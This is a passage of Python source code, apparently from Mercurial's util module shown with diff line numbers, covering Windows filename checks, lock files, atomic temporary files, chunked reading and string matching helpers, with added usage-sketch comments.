1607 1840 oslink(src, dst)
1608 1841 except (IOError, OSError):
1609 1842 hardlink = False
1610 1843 shutil.copy(src, dst)
1611 1844 else:
1612 1845 shutil.copy(src, dst)
1613 1846 num += 1
1614 1847 progress(topic, num)
1615 1848 progress(topic, None)
1616 1849
1617 1850 return hardlink, num
1618 1851
1619 1852 _winreservednames = {
1620 1853 'con', 'prn', 'aux', 'nul',
1621 1854 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1622 1855 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1623 1856 }
1624 1857 _winreservedchars = ':*?"<>|'
1625 1858 def checkwinfilename(path):
1626 1859 r'''Check that the base-relative path is a valid filename on Windows.
1627 1860 Returns None if the path is ok, or a UI string describing the problem.
1628 1861
1629 1862 >>> checkwinfilename(b"just/a/normal/path")
1630 1863 >>> checkwinfilename(b"foo/bar/con.xml")
1631 1864 "filename contains 'con', which is reserved on Windows"
1632 1865 >>> checkwinfilename(b"foo/con.xml/bar")
1633 1866 "filename contains 'con', which is reserved on Windows"
1634 1867 >>> checkwinfilename(b"foo/bar/xml.con")
1635 1868 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1636 1869 "filename contains 'AUX', which is reserved on Windows"
1637 1870 >>> checkwinfilename(b"foo/bar/bla:.txt")
1638 1871 "filename contains ':', which is reserved on Windows"
1639 1872 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1640 1873 "filename contains '\\x07', which is invalid on Windows"
1641 1874 >>> checkwinfilename(b"foo/bar/bla ")
1642 1875 "filename ends with ' ', which is not allowed on Windows"
1643 1876 >>> checkwinfilename(b"../bar")
1644 1877 >>> checkwinfilename(b"foo\\")
1645 1878 "filename ends with '\\', which is invalid on Windows"
1646 1879 >>> checkwinfilename(b"foo\\/bar")
1647 1880 "directory name ends with '\\', which is invalid on Windows"
1648 1881 '''
1649 1882 if path.endswith('\\'):
1650 1883 return _("filename ends with '\\', which is invalid on Windows")
1651 1884 if '\\/' in path:
1652 1885 return _("directory name ends with '\\', which is invalid on Windows")
1653 1886 for n in path.replace('\\', '/').split('/'):
1654 1887 if not n:
1655 1888 continue
1656 1889 for c in _filenamebytestr(n):
1657 1890 if c in _winreservedchars:
1658 1891 return _("filename contains '%s', which is reserved "
1659 1892 "on Windows") % c
1660 1893 if ord(c) <= 31:
1661 1894 return _("filename contains '%s', which is invalid "
1662 1895 "on Windows") % escapestr(c)
1663 1896 base = n.split('.')[0]
1664 1897 if base and base.lower() in _winreservednames:
1665 1898 return _("filename contains '%s', which is reserved "
1666 1899 "on Windows") % base
1667 1900 t = n[-1:]
1668 1901 if t in '. ' and n not in '..':
1669 1902 return _("filename ends with '%s', which is not allowed "
1670 1903 "on Windows") % t
1671 1904
1672 1905 if pycompat.iswindows:
1673 1906 checkosfilename = checkwinfilename
1674 1907 timer = time.clock
1675 1908 else:
1676 1909 checkosfilename = platform.checkosfilename
1677 1910 timer = time.time
1678 1911
1679 1912 if safehasattr(time, "perf_counter"):
1680 1913 timer = time.perf_counter
1681 1914
1682 1915 def makelock(info, pathname):
1683 1916 """Create a lock file atomically if possible
1684 1917
1685 1918 This may leave a stale lock file if symlink isn't supported and signal
1686 1919 interrupt is enabled.
1687 1920 """
1688 1921 try:
1689 1922 return os.symlink(info, pathname)
1690 1923 except OSError as why:
1691 1924 if why.errno == errno.EEXIST:
1692 1925 raise
1693 1926 except AttributeError: # no symlink in os
1694 1927 pass
1695 1928
1696 1929 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1697 1930 ld = os.open(pathname, flags)
1698 1931 os.write(ld, info)
1699 1932 os.close(ld)
1700 1933
1701 1934 def readlock(pathname):
1702 1935 try:
1703 1936 return os.readlink(pathname)
1704 1937 except OSError as why:
1705 1938 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1706 1939 raise
1707 1940 except AttributeError: # no symlink in os
1708 1941 pass
1709 1942 fp = posixfile(pathname, 'rb')
1710 1943 r = fp.read()
1711 1944 fp.close()
1712 1945 return r
1713 1946
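# Lock file round trip, sketched with hypothetical values:
#
#   makelock(b'host:12345', b'.hg/wlock')  # symlink when supported,
#                                          # otherwise an O_EXCL file
#   readlock(b'.hg/wlock')                 # -> b'host:12345', handling
#                                          # either representation
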
1714 1947 def fstat(fp):
1715 1948 '''stat file object that may not have fileno method.'''
1716 1949 try:
1717 1950 return os.fstat(fp.fileno())
1718 1951 except AttributeError:
1719 1952 return os.stat(fp.name)
1720 1953
1721 1954 # File system features
1722 1955
1723 1956 def fscasesensitive(path):
1724 1957 """
1725 1958 Return true if the given path is on a case-sensitive filesystem
1726 1959
1727 1960 Requires a path (like /foo/.hg) ending with a foldable final
1728 1961 directory component.
1729 1962 """
1730 1963 s1 = os.lstat(path)
1731 1964 d, b = os.path.split(path)
1732 1965 b2 = b.upper()
1733 1966 if b == b2:
1734 1967 b2 = b.lower()
1735 1968 if b == b2:
1736 1969 return True # no evidence against case sensitivity
1737 1970 p2 = os.path.join(d, b2)
1738 1971 try:
1739 1972 s2 = os.lstat(p2)
1740 1973 if s2 == s1:
1741 1974 return False
1742 1975 return True
1743 1976 except OSError:
1744 1977 return True
1745 1978
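# Sketch: fscasesensitive(b'/repo/.hg') lstat()s the path, then retries
# with the final component case-swapped (b'/repo/.HG'); an identical
# stat result means the filesystem folds case, so False is returned.
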
1746 1979 try:
1747 1980 import re2
1748 1981 _re2 = None
1749 1982 except ImportError:
1750 1983 _re2 = False
1751 1984
1752 1985 class _re(object):
1753 1986 def _checkre2(self):
1754 1987 global _re2
1755 1988 try:
1756 1989 # check if match works, see issue3964
1757 1990 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1758 1991 except ImportError:
1759 1992 _re2 = False
1760 1993
1761 1994 def compile(self, pat, flags=0):
1762 1995 '''Compile a regular expression, using re2 if possible
1763 1996
1764 1997 For best performance, use only re2-compatible regexp features. The
1765 1998 only flags from the re module that are re2-compatible are
1766 1999 IGNORECASE and MULTILINE.'''
1767 2000 if _re2 is None:
1768 2001 self._checkre2()
1769 2002 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1770 2003 if flags & remod.IGNORECASE:
1771 2004 pat = '(?i)' + pat
1772 2005 if flags & remod.MULTILINE:
1773 2006 pat = '(?m)' + pat
1774 2007 try:
1775 2008 return re2.compile(pat)
1776 2009 except re2.error:
1777 2010 pass
1778 2011 return remod.compile(pat, flags)
1779 2012
1780 2013 @propertycache
1781 2014 def escape(self):
1782 2015 '''Return the version of escape corresponding to self.compile.
1783 2016
1784 2017 This is imperfect because whether re2 or re is used for a particular
1785 2018 function depends on the flags, etc, but it's the best we can do.
1786 2019 '''
1787 2020 global _re2
1788 2021 if _re2 is None:
1789 2022 self._checkre2()
1790 2023 if _re2:
1791 2024 return re2.escape
1792 2025 else:
1793 2026 return remod.escape
1794 2027
1795 2028 re = _re()
1796 2029
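# Usage sketch for the re2-aware wrapper defined above:
#
#   pat = re.compile(br'^[a-z]+$', remod.IGNORECASE)
#   # re2 is used when it is importable and the flags are limited to
#   # IGNORECASE/MULTILINE (rewritten as inline (?i)/(?m) prefixes);
#   # otherwise this falls back to the stdlib re module
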
1797 2030 _fspathcache = {}
1798 2031 def fspath(name, root):
1799 2032 '''Get name in the case stored in the filesystem
1800 2033
1801 2034 The name should be relative to root, and be normcase-ed for efficiency.
1802 2035
1803 2036 Note that this function is unnecessary, and should not be
1804 2037 called, for case-sensitive filesystems (simply because it's expensive).
1805 2038
1806 2039 The root should be normcase-ed, too.
1807 2040 '''
1808 2041 def _makefspathcacheentry(dir):
1809 2042 return dict((normcase(n), n) for n in os.listdir(dir))
1810 2043
1811 2044 seps = pycompat.ossep
1812 2045 if pycompat.osaltsep:
1813 2046 seps = seps + pycompat.osaltsep
1814 2047 # Protect backslashes. This gets silly very quickly.
1815 2048 seps = seps.replace('\\','\\\\')
1816 2049 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1817 2050 dir = os.path.normpath(root)
1818 2051 result = []
1819 2052 for part, sep in pattern.findall(name):
1820 2053 if sep:
1821 2054 result.append(sep)
1822 2055 continue
1823 2056
1824 2057 if dir not in _fspathcache:
1825 2058 _fspathcache[dir] = _makefspathcacheentry(dir)
1826 2059 contents = _fspathcache[dir]
1827 2060
1828 2061 found = contents.get(part)
1829 2062 if not found:
1830 2063 # retry "once per directory" per "dirstate.walk" which
1831 2064 # may take place for each patch of "hg qpush", for example
1832 2065 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1833 2066 found = contents.get(part)
1834 2067
1835 2068 result.append(found or part)
1836 2069 dir = os.path.join(dir, part)
1837 2070
1838 2071 return ''.join(result)
1839 2072
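# fspath() sketch; the names are hypothetical:
#
#   fspath(b'foo/readme.txt', b'/repo')
#   # may return b'Foo/README.txt' if that is the on-disk spelling; both
#   # arguments must already be normcase()-ed, and directory listings
#   # are memoized in _fspathcache (refreshed once per miss)
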
1840 2073 def checknlink(testfile):
1841 2074 '''check whether hardlink count reporting works properly'''
1842 2075
1843 2076 # testfile may be open, so we need a separate file for checking to
1844 2077 # work around issue2543 (or testfile may get lost on Samba shares)
1845 2078 f1, f2, fp = None, None, None
1846 2079 try:
1847 2080 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1848 2081 suffix='1~', dir=os.path.dirname(testfile))
1849 2082 os.close(fd)
1850 2083 f2 = '%s2~' % f1[:-2]
1851 2084
1852 2085 oslink(f1, f2)
1853 2086 # nlinks() may behave differently for files on Windows shares if
1854 2087 # the file is open.
1855 2088 fp = posixfile(f2)
1856 2089 return nlinks(f2) > 1
1857 2090 except OSError:
1858 2091 return False
1859 2092 finally:
1860 2093 if fp is not None:
1861 2094 fp.close()
1862 2095 for f in (f1, f2):
1863 2096 try:
1864 2097 if f is not None:
1865 2098 os.unlink(f)
1866 2099 except OSError:
1867 2100 pass
1868 2101
1869 2102 def endswithsep(path):
1870 2103 '''Check path ends with os.sep or os.altsep.'''
1871 2104 return (path.endswith(pycompat.ossep)
1872 2105 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1873 2106
1874 2107 def splitpath(path):
1875 2108 '''Split path by os.sep.
1876 2109 Note that this function does not use os.altsep because this is
1877 2110 an alternative to a simple "xxx.split(os.sep)".
1878 2111 It is recommended to use os.path.normpath() before using this
1879 2112 function if needed.'''
1880 2113 return path.split(pycompat.ossep)
1881 2114
1882 2115 def gui():
1883 2116 '''Are we running in a GUI?'''
1884 2117 if pycompat.isdarwin:
1885 2118 if 'SSH_CONNECTION' in encoding.environ:
1886 2119 # handle SSH access to a box where the user is logged in
1887 2120 return False
1888 2121 elif getattr(osutil, 'isgui', None):
1889 2122 # check if a CoreGraphics session is available
1890 2123 return osutil.isgui()
1891 2124 else:
1892 2125 # pure build; use a safe default
1893 2126 return True
1894 2127 else:
1895 2128 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1896 2129
1897 2130 def mktempcopy(name, emptyok=False, createmode=None):
1898 2131 """Create a temporary file with the same contents from name
1899 2132
1900 2133 The permission bits are copied from the original file.
1901 2134
1902 2135 If the temporary file is going to be truncated immediately, you
1903 2136 can use emptyok=True as an optimization.
1904 2137
1905 2138 Returns the name of the temporary file.
1906 2139 """
1907 2140 d, fn = os.path.split(name)
1908 2141 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1909 2142 os.close(fd)
1910 2143 # Temporary files are created with mode 0600, which is usually not
1911 2144 # what we want. If the original file already exists, just copy
1912 2145 # its mode. Otherwise, manually obey umask.
1913 2146 copymode(name, temp, createmode)
1914 2147 if emptyok:
1915 2148 return temp
1916 2149 try:
1917 2150 try:
1918 2151 ifp = posixfile(name, "rb")
1919 2152 except IOError as inst:
1920 2153 if inst.errno == errno.ENOENT:
1921 2154 return temp
1922 2155 if not getattr(inst, 'filename', None):
1923 2156 inst.filename = name
1924 2157 raise
1925 2158 ofp = posixfile(temp, "wb")
1926 2159 for chunk in filechunkiter(ifp):
1927 2160 ofp.write(chunk)
1928 2161 ifp.close()
1929 2162 ofp.close()
1930 2163 except: # re-raises
1931 2164 try:
1932 2165 os.unlink(temp)
1933 2166 except OSError:
1934 2167 pass
1935 2168 raise
1936 2169 return temp
1937 2170
1938 2171 class filestat(object):
1939 2172 """help to exactly detect change of a file
1940 2173
1941 2174 'stat' attribute is result of 'os.stat()' if specified 'path'
1942 2175 exists. Otherwise, it is None. This can avoid preparative
1943 2176 'exists()' examination on client side of this class.
1944 2177 """
1945 2178 def __init__(self, stat):
1946 2179 self.stat = stat
1947 2180
1948 2181 @classmethod
1949 2182 def frompath(cls, path):
1950 2183 try:
1951 2184 stat = os.stat(path)
1952 2185 except OSError as err:
1953 2186 if err.errno != errno.ENOENT:
1954 2187 raise
1955 2188 stat = None
1956 2189 return cls(stat)
1957 2190
1958 2191 @classmethod
1959 2192 def fromfp(cls, fp):
1960 2193 stat = os.fstat(fp.fileno())
1961 2194 return cls(stat)
1962 2195
1963 2196 __hash__ = object.__hash__
1964 2197
1965 2198 def __eq__(self, old):
1966 2199 try:
1967 2200 # if ambiguity between stat of new and old file is
1968 2201 # avoided, comparison of size, ctime and mtime is enough
1969 2202 # to exactly detect change of a file regardless of platform
1970 2203 return (self.stat.st_size == old.stat.st_size and
1971 2204 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1972 2205 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1973 2206 except AttributeError:
1974 2207 pass
1975 2208 try:
1976 2209 return self.stat is None and old.stat is None
1977 2210 except AttributeError:
1978 2211 return False
1979 2212
1980 2213 def isambig(self, old):
1981 2214 """Examine whether new (= self) stat is ambiguous against old one
1982 2215
1983 2216 "S[N]" below means stat of a file at N-th change:
1984 2217
1985 2218 - S[n-1].ctime < S[n].ctime: can detect change of a file
1986 2219 - S[n-1].ctime == S[n].ctime
1987 2220 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1988 2221 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1989 2222 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1990 2223 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1991 2224
1992 2225 Case (*2) above means that a file was changed twice or more at
1993 2226 same time in sec (= S[n-1].ctime), and comparison of timestamp
1994 2227 is ambiguous.
1995 2228
1996 2229 The basic idea for avoiding such ambiguity is to "advance mtime by
1997 2230 1 sec if the timestamp is ambiguous".
1998 2231
1999 2232 But advancing mtime only in case (*2) doesn't work as
2000 2233 expected, because naturally advanced S[n].mtime in case (*1)
2001 2234 might be equal to manually advanced S[n-1 or earlier].mtime.
2002 2235
2003 2236 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2004 2237 treated as ambiguous regardless of mtime, to avoid overlooking
2005 2238 changes hidden by such colliding mtimes.
2006 2239
2007 2240 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2008 2241 S[n].mtime", even if size of a file isn't changed.
2009 2242 """
2010 2243 try:
2011 2244 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2012 2245 except AttributeError:
2013 2246 return False
2014 2247
2015 2248 def avoidambig(self, path, old):
2016 2249 """Change file stat of specified path to avoid ambiguity
2017 2250
2018 2251 'old' should be previous filestat of 'path'.
2019 2252
2020 2253 Ambiguity avoidance is skipped if the process doesn't have
2021 2254 appropriate privileges for 'path'; in that case this returns
2022 2255 False.
2023 2256
2024 2257 Otherwise, this returns True, as "ambiguity is avoided".
2025 2258 """
2026 2259 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2027 2260 try:
2028 2261 os.utime(path, (advanced, advanced))
2029 2262 except OSError as inst:
2030 2263 if inst.errno == errno.EPERM:
2031 2264 # utime() on the file created by another user causes EPERM,
2032 2265 # if a process doesn't have appropriate privileges
2033 2266 return False
2034 2267 raise
2035 2268 return True
2036 2269
2037 2270 def __ne__(self, other):
2038 2271 return not self == other
2039 2272
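# Worked example of the rule implemented by filestat.isambig(), with a
# hypothetical path:
#
#   old = filestat.frompath(path)
#   # ... the file is rewritten within the same second ...
#   new = filestat.frompath(path)
#   new.isambig(old)           # True: equal ctimes mean the
#                              # size/ctime/mtime comparison cannot
#                              # prove a change
#   new.avoidambig(path, old)  # sets mtime to old mtime + 1, masked
#                              # to 31 bits
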
2040 2273 class atomictempfile(object):
2041 2274 '''writable file object that atomically updates a file
2042 2275
2043 2276 All writes will go to a temporary copy of the original file. Call
2044 2277 close() when you are done writing, and atomictempfile will rename
2045 2278 the temporary copy to the original name, making the changes
2046 2279 visible. If the object is destroyed without being closed, all your
2047 2280 writes are discarded.
2048 2281
2049 2282 checkambig argument of constructor is used with filestat, and is
2050 2283 useful only if target file is guarded by any lock (e.g. repo.lock
2051 2284 or repo.wlock).
2052 2285 '''
2053 2286 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2054 2287 self.__name = name # permanent name
2055 2288 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2056 2289 createmode=createmode)
2057 2290 self._fp = posixfile(self._tempname, mode)
2058 2291 self._checkambig = checkambig
2059 2292
2060 2293 # delegated methods
2061 2294 self.read = self._fp.read
2062 2295 self.write = self._fp.write
2063 2296 self.seek = self._fp.seek
2064 2297 self.tell = self._fp.tell
2065 2298 self.fileno = self._fp.fileno
2066 2299
2067 2300 def close(self):
2068 2301 if not self._fp.closed:
2069 2302 self._fp.close()
2070 2303 filename = localpath(self.__name)
2071 2304 oldstat = self._checkambig and filestat.frompath(filename)
2072 2305 if oldstat and oldstat.stat:
2073 2306 rename(self._tempname, filename)
2074 2307 newstat = filestat.frompath(filename)
2075 2308 if newstat.isambig(oldstat):
2076 2309 # stat of changed file is ambiguous to original one
2077 2310 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2078 2311 os.utime(filename, (advanced, advanced))
2079 2312 else:
2080 2313 rename(self._tempname, filename)
2081 2314
2082 2315 def discard(self):
2083 2316 if not self._fp.closed:
2084 2317 try:
2085 2318 os.unlink(self._tempname)
2086 2319 except OSError:
2087 2320 pass
2088 2321 self._fp.close()
2089 2322
2090 2323 def __del__(self):
2091 2324 if safehasattr(self, '_fp'): # constructor actually did something
2092 2325 self.discard()
2093 2326
2094 2327 def __enter__(self):
2095 2328 return self
2096 2329
2097 2330 def __exit__(self, exctype, excvalue, traceback):
2098 2331 if exctype is not None:
2099 2332 self.discard()
2100 2333 else:
2101 2334 self.close()
2102 2335
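# Typical atomictempfile usage; the filename is hypothetical:
#
#   with atomictempfile(b'.hg/requires') as fp:
#       fp.write(b'revlogv1\n')
#   # the temporary copy is renamed over the target on a clean exit of
#   # the with-block and discarded if the block raises
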
2103 2336 def unlinkpath(f, ignoremissing=False):
2104 2337 """unlink and remove the directory if it is empty"""
2105 2338 if ignoremissing:
2106 2339 tryunlink(f)
2107 2340 else:
2108 2341 unlink(f)
2109 2342 # try removing directories that might now be empty
2110 2343 try:
2111 2344 removedirs(os.path.dirname(f))
2112 2345 except OSError:
2113 2346 pass
2114 2347
2115 2348 def tryunlink(f):
2116 2349 """Attempt to remove a file, ignoring ENOENT errors."""
2117 2350 try:
2118 2351 unlink(f)
2119 2352 except OSError as e:
2120 2353 if e.errno != errno.ENOENT:
2121 2354 raise
2122 2355
2123 2356 def makedirs(name, mode=None, notindexed=False):
2124 2357 """recursive directory creation with parent mode inheritance
2125 2358
2126 2359 Newly created directories are marked as "not to be indexed by
2127 2360 the content indexing service", if ``notindexed`` is specified
2128 2361 for "write" mode access.
2129 2362 """
2130 2363 try:
2131 2364 makedir(name, notindexed)
2132 2365 except OSError as err:
2133 2366 if err.errno == errno.EEXIST:
2134 2367 return
2135 2368 if err.errno != errno.ENOENT or not name:
2136 2369 raise
2137 2370 parent = os.path.dirname(os.path.abspath(name))
2138 2371 if parent == name:
2139 2372 raise
2140 2373 makedirs(parent, mode, notindexed)
2141 2374 try:
2142 2375 makedir(name, notindexed)
2143 2376 except OSError as err:
2144 2377 # Catch EEXIST to handle races
2145 2378 if err.errno == errno.EEXIST:
2146 2379 return
2147 2380 raise
2148 2381 if mode is not None:
2149 2382 os.chmod(name, mode)
2150 2383
2151 2384 def readfile(path):
2152 2385 with open(path, 'rb') as fp:
2153 2386 return fp.read()
2154 2387
2155 2388 def writefile(path, text):
2156 2389 with open(path, 'wb') as fp:
2157 2390 fp.write(text)
2158 2391
2159 2392 def appendfile(path, text):
2160 2393 with open(path, 'ab') as fp:
2161 2394 fp.write(text)
2162 2395
2163 2396 class chunkbuffer(object):
2164 2397 """Allow arbitrary sized chunks of data to be efficiently read from an
2165 2398 iterator over chunks of arbitrary size."""
2166 2399
2167 2400 def __init__(self, in_iter):
2168 2401 """in_iter is the iterator that's iterating over the input chunks."""
2169 2402 def splitbig(chunks):
2170 2403 for chunk in chunks:
2171 2404 if len(chunk) > 2**20:
2172 2405 pos = 0
2173 2406 while pos < len(chunk):
2174 2407 end = pos + 2 ** 18
2175 2408 yield chunk[pos:end]
2176 2409 pos = end
2177 2410 else:
2178 2411 yield chunk
2179 2412 self.iter = splitbig(in_iter)
2180 2413 self._queue = collections.deque()
2181 2414 self._chunkoffset = 0
2182 2415
2183 2416 def read(self, l=None):
2184 2417 """Read L bytes of data from the iterator of chunks of data.
2185 2418 Returns less than L bytes if the iterator runs dry.
2186 2419
2187 2420 If size parameter is omitted, read everything"""
2188 2421 if l is None:
2189 2422 return ''.join(self.iter)
2190 2423
2191 2424 left = l
2192 2425 buf = []
2193 2426 queue = self._queue
2194 2427 while left > 0:
2195 2428 # refill the queue
2196 2429 if not queue:
2197 2430 target = 2**18
2198 2431 for chunk in self.iter:
2199 2432 queue.append(chunk)
2200 2433 target -= len(chunk)
2201 2434 if target <= 0:
2202 2435 break
2203 2436 if not queue:
2204 2437 break
2205 2438
2206 2439 # The easy way to do this would be to queue.popleft(), modify the
2207 2440 # chunk (if necessary), then queue.appendleft(). However, for cases
2208 2441 # where we read partial chunk content, this incurs 2 dequeue
2209 2442 # mutations and creates a new str for the remaining chunk in the
2210 2443 # queue. Our code below avoids this overhead.
2211 2444
2212 2445 chunk = queue[0]
2213 2446 chunkl = len(chunk)
2214 2447 offset = self._chunkoffset
2215 2448
2216 2449 # Use full chunk.
2217 2450 if offset == 0 and left >= chunkl:
2218 2451 left -= chunkl
2219 2452 queue.popleft()
2220 2453 buf.append(chunk)
2221 2454 # self._chunkoffset remains at 0.
2222 2455 continue
2223 2456
2224 2457 chunkremaining = chunkl - offset
2225 2458
2226 2459 # Use all of unconsumed part of chunk.
2227 2460 if left >= chunkremaining:
2228 2461 left -= chunkremaining
2229 2462 queue.popleft()
2230 2463 # offset == 0 is enabled by block above, so this won't merely
2231 2464 # copy via ``chunk[0:]``.
2232 2465 buf.append(chunk[offset:])
2233 2466 self._chunkoffset = 0
2234 2467
2235 2468 # Partial chunk needed.
2236 2469 else:
2237 2470 buf.append(chunk[offset:offset + left])
2238 2471 self._chunkoffset += left
2239 2472 left -= chunkremaining
2240 2473
2241 2474 return ''.join(buf)
2242 2475
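# chunkbuffer sketch: re-chunking an unevenly chunked iterator:
#
#   cb = chunkbuffer(iter([b'ab', b'cdef', b'g']))
#   cb.read(3)   # -> b'abc' (offset tracking avoids re-queueing the
#                # remainder of b'cdef')
#   cb.read(10)  # -> b'defg' (short read: the iterator ran dry)
#   # input chunks larger than 1MB are pre-split into 256KB pieces
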
2243 2476 def filechunkiter(f, size=131072, limit=None):
2244 2477 """Create a generator that produces the data in the file size
2245 2478 (default 131072) bytes at a time, up to optional limit (default is
2246 2479 to read all data). Chunks may be less than size bytes if the
2247 2480 chunk is the last chunk in the file, or the file is a socket or
2248 2481 some other type of file that sometimes reads less data than is
2249 2482 requested."""
2250 2483 assert size >= 0
2251 2484 assert limit is None or limit >= 0
2252 2485 while True:
2253 2486 if limit is None:
2254 2487 nbytes = size
2255 2488 else:
2256 2489 nbytes = min(limit, size)
2257 2490 s = nbytes and f.read(nbytes)
2258 2491 if not s:
2259 2492 break
2260 2493 if limit:
2261 2494 limit -= len(s)
2262 2495 yield s
2263 2496
2264 2497 class cappedreader(object):
2265 2498 """A file object proxy that allows reading up to N bytes.
2266 2499
2267 2500 Given a source file object, instances of this type allow reading up to
2268 2501 N bytes from that source file object. Attempts to read past the allowed
2269 2502 limit are treated as EOF.
2270 2503
2271 2504 It is assumed that I/O is not performed on the original file object
2272 2505 in addition to I/O that is performed by this instance. If there is,
2273 2506 state tracking will get out of sync and unexpected results will ensue.
2274 2507 """
2275 2508 def __init__(self, fh, limit):
2276 2509 """Allow reading up to <limit> bytes from <fh>."""
2277 2510 self._fh = fh
2278 2511 self._left = limit
2279 2512
2280 2513 def read(self, n=-1):
2281 2514 if not self._left:
2282 2515 return b''
2283 2516
2284 2517 if n < 0:
2285 2518 n = self._left
2286 2519
2287 2520 data = self._fh.read(min(n, self._left))
2288 2521 self._left -= len(data)
2289 2522 assert self._left >= 0
2290 2523
2291 2524 return data
2292 2525
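# cappedreader sketch:
#
#   fh = stringio(b'0123456789')
#   r = cappedreader(fh, 4)
#   r.read()   # -> b'0123' (reads are capped at the limit)
#   r.read(2)  # -> b'' (past the cap is treated as EOF)
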
2293 2526 def stringmatcher(pattern, casesensitive=True):
2294 2527 """
2295 2528 accepts a string, possibly starting with a 're:' or 'literal:' prefix.
2296 2529 returns the matcher name, pattern, and matcher function.
2297 2530 missing or unknown prefixes are treated as literal matches.
2298 2531
2299 2532 helper for tests:
2300 2533 >>> def test(pattern, *tests):
2301 2534 ... kind, pattern, matcher = stringmatcher(pattern)
2302 2535 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2303 2536 >>> def itest(pattern, *tests):
2304 2537 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2305 2538 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2306 2539
2307 2540 exact matching (no prefix):
2308 2541 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2309 2542 ('literal', 'abcdefg', [False, False, True])
2310 2543
2311 2544 regex matching ('re:' prefix)
2312 2545 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2313 2546 ('re', 'a.+b', [False, False, True])
2314 2547
2315 2548 force exact matches ('literal:' prefix)
2316 2549 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2317 2550 ('literal', 're:foobar', [False, True])
2318 2551
2319 2552 unknown prefixes are ignored and treated as literals
2320 2553 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2321 2554 ('literal', 'foo:bar', [False, False, True])
2322 2555
2323 2556 case insensitive regex matches
2324 2557 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2325 2558 ('re', 'A.+b', [False, False, True])
2326 2559
2327 2560 case insensitive literal matches
2328 2561 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2329 2562 ('literal', 'ABCDEFG', [False, False, True])
2330 2563 """
2331 2564 if pattern.startswith('re:'):
2332 2565 pattern = pattern[3:]
2333 2566 try:
2334 2567 flags = 0
2335 2568 if not casesensitive:
2336 2569 flags = remod.I
2337 2570 regex = remod.compile(pattern, flags)
2338 2571 except remod.error as e:
2339 2572 raise error.ParseError(_('invalid regular expression: %s')
2340 2573 % e)
2341 2574 return 're', pattern, regex.search
2342 2575 elif pattern.startswith('literal:'):
2343 2576 pattern = pattern[8:]
2344 2577
2345 2578 match = pattern.__eq__
2346 2579
2347 2580 if not casesensitive:
2348 2581 ipat = encoding.lower(pattern)
2349 2582 match = lambda s: ipat == encoding.lower(s)
2350 2583 return 'literal', pattern, match
2351 2584
2352 2585 def shortuser(user):
2353 2586 """Return a short representation of a user name or email address."""
2354 2587 f = user.find('@')
2355 2588 if f >= 0:
2356 2589 user = user[:f]
2357 2590 f = user.find('<')
2358 2591 if f >= 0:
2359 2592 user = user[f + 1:]
2360 2593 f = user.find(' ')
2361 2594 if f >= 0:
2362 2595 user = user[:f]
2363 2596 f = user.find('.')
2364 2597 if f >= 0:
2365 2598 user = user[:f]
2366 2599 return user
2367 2600
2368 2601 def emailuser(user):
2369 2602 """Return the user portion of an email address."""
2370 2603 f = user.find('@')
2371 2604 if f >= 0:
2372 2605 user = user[:f]
2373 2606 f = user.find('<')
2374 2607 if f >= 0:
2375 2608 user = user[f + 1:]
2376 2609 return user
2377 2610
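# shortuser()/emailuser() sketch:
#
#   shortuser(b'Foo Bar <foo.bar@example.com>')  # -> b'foo'
#   emailuser(b'Foo Bar <foo.bar@example.com>')  # -> b'foo.bar'
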
2378 2611 def email(author):
2379 2612 '''get email of author.'''
2380 2613 r = author.find('>')
2381 2614 if r == -1:
2382 2615 r = None
2383 2616 return author[author.find('<') + 1:r]
2384 2617
2385 2618 def ellipsis(text, maxlength=400):
2386 2619 """Trim string to at most maxlength (default: 400) columns in display."""
2387 2620 return encoding.trim(text, maxlength, ellipsis='...')
2388 2621
2389 2622 def unitcountfn(*unittable):
2390 2623 '''return a function that renders a readable count of some quantity'''
2391 2624
2392 2625 def go(count):
2393 2626 for multiplier, divisor, format in unittable:
2394 2627 if abs(count) >= divisor * multiplier:
2395 2628 return format % (count / float(divisor))
2396 2629 return unittable[-1][2] % count
2397 2630
2398 2631 return go
2399 2632
2400 2633 def processlinerange(fromline, toline):
2401 2634 """Check that linerange <fromline>:<toline> makes sense and return a
2402 2635 0-based range.
2403 2636
2404 2637 >>> processlinerange(10, 20)
2405 2638 (9, 20)
2406 2639 >>> processlinerange(2, 1)
2407 2640 Traceback (most recent call last):
2408 2641 ...
2409 2642 ParseError: line range must be positive
